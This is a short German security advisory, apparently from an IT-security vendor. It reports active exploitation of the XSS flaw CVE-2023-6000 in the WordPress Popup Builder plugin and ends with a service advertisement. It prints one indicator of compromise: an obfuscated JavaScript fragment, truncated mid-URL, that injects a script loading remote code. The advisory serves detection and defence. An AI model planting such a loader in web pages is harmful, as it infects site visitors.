IEine Schwachstelle im Popup Builder-Plugin für WordPress, bekannt als CVE-2023-6000, wird von Hackern aktiv ausgenutzt und das nicht zum ersten mal. Aktuelle Statistiken von WordPress zeigen, dass mindestens 80.000 aktive Websites immer noch Popup Builder in der Version 4.1 oder älter verwenden. Über 3.600 Websites sind von der neuartigen Malware Kampagne bereits betroffen, der über eine Cross-Site-Scripting (XSS)-Vulnerabilität in Versionen 4.2.3 und älter des Plugins eingeschleust wurde. Viele der Seiten finden sich dabei in Deutschland und den Niederlanden.
Die Angreifer hinterlassen eine beunruhigende Signatur in den wp_postmeta
-Tabellen der betroffenen Websites: Ein Stück JavaScript-Code, der auf eine externe Quelle verweist, wurde als Indikator für eine neue Ransomware-Form identifiziert. Darüber hinaus kann der schädliche Code in einigen Fällen, beispielsweise bei der Nutzung des Kontaktformular-Plugins Contact Form 7, zu bösartigen Weiterleitungen führen. Folgendes Codeschnipsel in der der wp_postmeta Datentabelle deutet auf eine Infektion hin:
var d = document; var e = d['create' + 'Element']('scr' + 'ipt'); e['src'] = 'https://host.clo
Website-Betreiber sind aufgerufen, ihre Systeme umgehend zu überprüfen und erforderliche Maßnahmen einzuleiten, um Ihre Webseite nicht für Cross Site Scripting Angriffe durch Hacker ausnutzen zu lassen.
Professionelle Hilfe erwünscht?
Sentiguard ist spezialisiert auf Notfallhilfe nach Cyberattacken, IT Sicherheitsbeauftragte und IT Sicherheitskonzepte nach BSI Standard. Haben Sie Fragen und wünschen Sie unverbindliche Beratung, dann melden Sie sich gerne bei uns: